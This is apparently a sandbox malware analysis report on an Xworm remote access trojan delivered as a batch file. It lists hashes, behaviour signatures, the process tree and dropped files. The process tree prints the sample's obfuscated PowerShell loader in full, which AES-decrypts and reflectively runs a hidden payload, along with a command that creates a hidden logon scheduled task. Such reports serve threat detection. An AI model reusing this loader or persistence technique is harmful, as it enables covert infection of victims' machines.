Analysis

  • max time kernel
    11s
  • max time network
    17s
  • platform
    windows11-21h2_x64
  • resource
    win11-20250218-en
  • resource tags

    arch:x64arch:x86image:win11-20250218-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    08/03/2025, 00:09

General

  • Target

    RedwareTemp.bat

  • Size

    548KB

  • MD5

    73c36e7e75e989f8b1e5dd4e9a1b493d

  • SHA1

    af5bf582a6d1b424355f8af579b8f202fbe4b834

  • SHA256

    2b0fa86f46148d25d365085a021a9b836e34275955ca0446723553bbcf388ac0

  • SHA512

    5c95fcfb41ca505ca2a9d7d0f11d4e57831bfabd5e1c741c6bf26b0b2a89e36524cca53e6eff3ad7ccac14c0030ab0fc76581275ee8acfe0304be216a6e6ec44

  • SSDEEP

    12288:FTiR+PqY3LWerg7f9AqvSU84kI3Hu+MoovimheIBVXMTT:RhAfcidQ6mEy8P

Malware Config

Extracted

Family

xworm

Attributes
  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs

    Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Run Powershell and hide display window.

  • Executes dropped EXE 1 IoCs
  • Enumerates connected drives 3 TTPs 2 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 41 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k DcomLaunch -p
    1⤵
    • Modifies registry class
    PID:820
    • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe
      "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca
      2⤵
        PID:4932
      • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
        "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
        2⤵
          PID:4936
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k RPCSS -p
        1⤵
          PID:948
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:1008
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:764
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1044
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1084
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
                  1⤵
                    PID:1156
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                    1⤵
                      PID:1188
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                      1⤵
                        PID:1200
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1248
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                          1⤵
                            PID:1256
                          • C:\Windows\System32\svchost.exe
                            C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                            1⤵
                              PID:1268
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1432
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                1⤵
                                  PID:1480
                                • C:\Windows\System32\svchost.exe
                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                  1⤵
                                    PID:1508
                                  • C:\Windows\system32\svchost.exe
                                    C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                    1⤵
                                      PID:1600
                                    • C:\Windows\System32\svchost.exe
                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                      1⤵
                                        PID:1616
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k NetworkService -p
                                        1⤵
                                          PID:1712
                                        • C:\Windows\system32\svchost.exe
                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                          1⤵
                                            PID:1732
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1768
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1836
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                1⤵
                                                  PID:1896
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1924
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1932
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:1112
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                        1⤵
                                                          PID:1244
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
                                                          1⤵
                                                            PID:2152
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2224
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2404
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2552
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2560
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p
                                                                    1⤵
                                                                      PID:2596
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2668
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                        1⤵
                                                                          PID:2740
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2748
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2768
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                              1⤵
                                                                                PID:3016
                                                                              • C:\Windows\Explorer.EXE
                                                                                C:\Windows\Explorer.EXE
                                                                                1⤵
                                                                                  PID:3264
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RedwareTemp.bat"
                                                                                    2⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:2708
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('olj6lNDH9BP9+WoXhpaGp14B/+RuhRlVS9vcmbQmtAw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+5d9Zu+yF4iwq9mJwhaRdw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dPZnK=New-Object System.IO.MemoryStream(,$param_var); $OVsRl=New-Object System.IO.MemoryStream; $Lntcu=New-Object System.IO.Compression.GZipStream($dPZnK, [IO.Compression.CompressionMode]::Decompress); $Lntcu.CopyTo($OVsRl); $Lntcu.Dispose(); $dPZnK.Dispose(); $OVsRl.Dispose(); $OVsRl.ToArray();}function execute_function($param_var,$param2_var){ $rQsSK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fhwRv=$rQsSK.EntryPoint; $fhwRv.Invoke($null, $param2_var);}$qkzrl = 'C:\Users\Admin\AppData\Local\Temp\RedwareTemp.bat';$host.UI.RawUI.WindowTitle = $qkzrl;$KRqly=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($qkzrl).Split([Environment]::NewLine);foreach ($NNMBM in $KRqly) { if ($NNMBM.StartsWith('AyaGWreXdjmRZwIZSJRC')) { $nXbFi=$NNMBM.Substring(20); break; }}$payloads_var=[string[]]$nXbFi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                      3⤵
                                                                                        PID:1392
                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                        3⤵
                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                        • Modifies registry class
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:1672
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_872_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_872.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                          4⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:3596
                                                                                        • C:\Windows\System32\WScript.exe
                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_872.vbs"
                                                                                          4⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:1884
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_872.bat" "
                                                                                            5⤵
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:844
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('olj6lNDH9BP9+WoXhpaGp14B/+RuhRlVS9vcmbQmtAw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('+5d9Zu+yF4iwq9mJwhaRdw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dPZnK=New-Object System.IO.MemoryStream(,$param_var); $OVsRl=New-Object System.IO.MemoryStream; $Lntcu=New-Object System.IO.Compression.GZipStream($dPZnK, [IO.Compression.CompressionMode]::Decompress); $Lntcu.CopyTo($OVsRl); $Lntcu.Dispose(); $dPZnK.Dispose(); $OVsRl.Dispose(); $OVsRl.ToArray();}function execute_function($param_var,$param2_var){ $rQsSK=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fhwRv=$rQsSK.EntryPoint; $fhwRv.Invoke($null, $param2_var);}$qkzrl = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_872.bat';$host.UI.RawUI.WindowTitle = $qkzrl;$KRqly=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($qkzrl).Split([Environment]::NewLine);foreach ($NNMBM in $KRqly) { if ($NNMBM.StartsWith('AyaGWreXdjmRZwIZSJRC')) { $nXbFi=$NNMBM.Substring(20); break; }}$payloads_var=[string[]]$nXbFi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                                                                                              6⤵
                                                                                                PID:4376
                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                6⤵
                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                PID:1360
                                                                                                • C:\Users\Admin\AppData\Local\Temp\RedwareTemp.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RedwareTemp.exe"
                                                                                                  7⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  PID:4064
                                                                                    • C:\Windows\system32\svchost.exe
                                                                                      C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                      1⤵
                                                                                        PID:3440
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                        1⤵
                                                                                          PID:3452
                                                                                        • C:\Windows\system32\svchost.exe
                                                                                          C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                          1⤵
                                                                                            PID:3996
                                                                                          • C:\Windows\system32\svchost.exe
                                                                                            C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                            1⤵
                                                                                              PID:4352
                                                                                            • C:\Windows\system32\svchost.exe
                                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                              1⤵
                                                                                                PID:4388
                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                1⤵
                                                                                                  PID:4364
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                  1⤵
                                                                                                    PID:1076
                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                    1⤵
                                                                                                      PID:3520
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                      1⤵
                                                                                                        PID:4396
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                        1⤵
                                                                                                          PID:1584
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                          1⤵
                                                                                                            PID:4072
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=5396,i,510155214614128252,14857291624332394009,262144 --variations-seed-version --mojo-platform-channel-handle=5480 /prefetch:14
                                                                                                            1⤵
                                                                                                              PID:3028
                                                                                                            • C:\Windows\System32\svchost.exe
                                                                                                              C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                              1⤵
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:3872
                                                                                                            • C:\Windows\explorer.exe
                                                                                                              explorer.exe
                                                                                                              1⤵
                                                                                                              • Boot or Logon Autostart Execution: Active Setup
                                                                                                              • Enumerates connected drives
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                              PID:4012

                                                                                                            Network

                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                            Replay Monitor

                                                                                                            Loading Replay Monitor...

                                                                                                            Downloads

                                                                                                            • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                              Filesize

                                                                                                              340B

                                                                                                              MD5

                                                                                                              ca1da441ef9a5b624c588b7e4edcfd1a

                                                                                                              SHA1

                                                                                                              4f3971843cecf5786a4ba74de97ee8521cd586a6

                                                                                                              SHA256

                                                                                                              0ed1dbc08402a5ab6a700a51508393364c57c47bc4298fea70cf7d43560e7a9f

                                                                                                              SHA512

                                                                                                              5aa25d675a2200da4546cdedcc9442555739ef4df13e2539994a828da04e24d727f8ffbd6c05d92b4171b3152eee2985166dadcf619c3dca70436ba990b15e76

                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                              Filesize

                                                                                                              3KB

                                                                                                              MD5

                                                                                                              df472dcddb36aa24247f8c8d8a517bd7

                                                                                                              SHA1

                                                                                                              6f54967355e507294cbc86662a6fbeedac9d7030

                                                                                                              SHA256

                                                                                                              e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

                                                                                                              SHA512

                                                                                                              06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                              Filesize

                                                                                                              1KB

                                                                                                              MD5

                                                                                                              3ec0d76d886b2f4b9f1e3da7ce9e2cd7

                                                                                                              SHA1

                                                                                                              68a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea

                                                                                                              SHA256

                                                                                                              214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5

                                                                                                              SHA512

                                                                                                              a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6

                                                                                                            • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\O9PSQQN7\www.bing[1].xml

                                                                                                              Filesize

                                                                                                              15KB

                                                                                                              MD5

                                                                                                              623c1a8b4364a7627b5ec446f6f7e919

                                                                                                              SHA1

                                                                                                              d4db9f192f6ae54b817500213b6059555222f48a

                                                                                                              SHA256

                                                                                                              a8b86dfbe78e35a75af7173438474a5585343d0539348cd0ff66d1c5d7073fea

                                                                                                              SHA512

                                                                                                              eff8a8bdad4347094b4cfa0b540b52d99ba9c25f3b85867a169314c58b050a6a02bbca0c0bb2d0d1efb68bbd90c0e613ac5bc5a78ff2c175f5db1e2117c8b608

                                                                                                            • C:\Users\Admin\AppData\Local\Packages\microsoftwindows.client.cbs_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                              Filesize

                                                                                                              340B

                                                                                                              MD5

                                                                                                              9ec4bc718ab5b127bc963141ba227347

                                                                                                              SHA1

                                                                                                              02aca3b2f60eef60c7e847fc31a48abde452ef1a

                                                                                                              SHA256

                                                                                                              698974d44bfb03562296a0a432bff0a229d992d76c09d68f2cab8a4ad4287d2f

                                                                                                              SHA512

                                                                                                              1ae54c353d252c0a9bf6aacb5771e5f4085e946de9260896288c93ebbaf74e6efd91dbe59736a0f4263b1aa5c29defa1f76e7760c3dc1553a61bdfe2d766e89e

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RedwareTemp.exe

                                                                                                              Filesize

                                                                                                              87KB

                                                                                                              MD5

                                                                                                              b048f3c90ffb82c5514d4645ea909064

                                                                                                              SHA1

                                                                                                              3090dd09c42a58b5e4adbb0626ebe94dd4c1e1bb

                                                                                                              SHA256

                                                                                                              2b63e6ea0082dd3dcdcdb53163a35b49c26ea622cadda60060f5e20215f4911b

                                                                                                              SHA512

                                                                                                              5f19016066d2f1117b64b6b820057aab27b61533cadf81a863978ef240bc43b6a080bf1eb8116267510c95e58979382753ac4d9767fc9930899714b51931e3de

                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_svee4qzm.n0v.ps1

                                                                                                              Filesize

                                                                                                              60B

                                                                                                              MD5

                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                              SHA1

                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                              SHA256

                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                              SHA512

                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                            • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_872.bat

                                                                                                              Filesize

                                                                                                              548KB

                                                                                                              MD5

                                                                                                              73c36e7e75e989f8b1e5dd4e9a1b493d

                                                                                                              SHA1

                                                                                                              af5bf582a6d1b424355f8af579b8f202fbe4b834

                                                                                                              SHA256

                                                                                                              2b0fa86f46148d25d365085a021a9b836e34275955ca0446723553bbcf388ac0

                                                                                                              SHA512

                                                                                                              5c95fcfb41ca505ca2a9d7d0f11d4e57831bfabd5e1c741c6bf26b0b2a89e36524cca53e6eff3ad7ccac14c0030ab0fc76581275ee8acfe0304be216a6e6ec44

                                                                                                            • C:\Users\Admin\AppData\Roaming\$phantom-startup_str_872.vbs

                                                                                                              Filesize

                                                                                                              124B

                                                                                                              MD5

                                                                                                              9166665baf7bb0073950282f9e564f9a

                                                                                                              SHA1

                                                                                                              778c5cabc610cd43a27ffe5d234c83b15c1cf4b4

                                                                                                              SHA256

                                                                                                              1ea16517b85d71981d4c02b1f5ff4919a351f58019ce1fc50110c8d7665ab4ae

                                                                                                              SHA512

                                                                                                              41ca22e2ff7553d321cf6b2acd6330398719c75dbf6ed2f4b2760763ddf632babf12a4cd802f7af92978b3df3bfcaea55a764170cf9792870313e7ce0bc62177

                                                                                                            • memory/1156-109-0x00007FF924C30000-0x00007FF924C40000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/1256-107-0x00007FF924C30000-0x00007FF924C40000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/1360-148-0x0000026C28040000-0x0000026C2805C000-memory.dmp

                                                                                                              Filesize

                                                                                                              112KB

                                                                                                            • memory/1616-105-0x00007FF924C30000-0x00007FF924C40000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/1672-15-0x0000022A9BE80000-0x0000022A9BEEC000-memory.dmp

                                                                                                              Filesize

                                                                                                              432KB

                                                                                                            • memory/1672-14-0x0000022A9BBC0000-0x0000022A9BBC8000-memory.dmp

                                                                                                              Filesize

                                                                                                              32KB

                                                                                                            • memory/1672-13-0x00007FF9435F0000-0x00007FF9440B2000-memory.dmp

                                                                                                              Filesize

                                                                                                              10.8MB

                                                                                                            • memory/1672-47-0x00007FF9435F0000-0x00007FF9440B2000-memory.dmp

                                                                                                              Filesize

                                                                                                              10.8MB

                                                                                                            • memory/1672-1-0x0000022A838C0000-0x0000022A838E2000-memory.dmp

                                                                                                              Filesize

                                                                                                              136KB

                                                                                                            • memory/1672-11-0x00007FF9435F0000-0x00007FF9440B2000-memory.dmp

                                                                                                              Filesize

                                                                                                              10.8MB

                                                                                                            • memory/1672-0-0x00007FF9435F3000-0x00007FF9435F5000-memory.dmp

                                                                                                              Filesize

                                                                                                              8KB

                                                                                                            • memory/1672-12-0x0000022A9BE30000-0x0000022A9BE76000-memory.dmp

                                                                                                              Filesize

                                                                                                              280KB

                                                                                                            • memory/1672-10-0x00007FF9435F0000-0x00007FF9440B2000-memory.dmp

                                                                                                              Filesize

                                                                                                              10.8MB

                                                                                                            • memory/1732-110-0x00007FF924C30000-0x00007FF924C40000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/1896-101-0x00007FF924C30000-0x00007FF924C40000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/2224-103-0x00007FF924C30000-0x00007FF924C40000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/2404-108-0x00007FF924C30000-0x00007FF924C40000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/2552-100-0x00007FF924C30000-0x00007FF924C40000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/2560-51-0x00007FF924C30000-0x00007FF924C40000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/2740-106-0x00007FF924C30000-0x00007FF924C40000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/2748-104-0x00007FF924C30000-0x00007FF924C40000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/3264-150-0x0000000003D70000-0x0000000003D82000-memory.dmp

                                                                                                              Filesize

                                                                                                              72KB

                                                                                                            • memory/3264-50-0x00007FF924C30000-0x00007FF924C40000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/3264-48-0x0000000000A10000-0x0000000000A3A000-memory.dmp

                                                                                                              Filesize

                                                                                                              168KB

                                                                                                            • memory/3452-102-0x00007FF924C30000-0x00007FF924C40000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/3520-111-0x00007FF924C30000-0x00007FF924C40000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB

                                                                                                            • memory/3596-30-0x00007FF9435F0000-0x00007FF9440B2000-memory.dmp

                                                                                                              Filesize

                                                                                                              10.8MB

                                                                                                            • memory/3596-27-0x00007FF9435F0000-0x00007FF9440B2000-memory.dmp

                                                                                                              Filesize

                                                                                                              10.8MB

                                                                                                            • memory/3596-18-0x00007FF9435F0000-0x00007FF9440B2000-memory.dmp

                                                                                                              Filesize

                                                                                                              10.8MB

                                                                                                            • memory/3596-17-0x00007FF9435F0000-0x00007FF9440B2000-memory.dmp

                                                                                                              Filesize

                                                                                                              10.8MB

                                                                                                            • memory/4064-161-0x0000000000570000-0x000000000058C000-memory.dmp

                                                                                                              Filesize

                                                                                                              112KB

                                                                                                            • memory/4072-99-0x00007FF924C30000-0x00007FF924C40000-memory.dmp

                                                                                                              Filesize

                                                                                                              64KB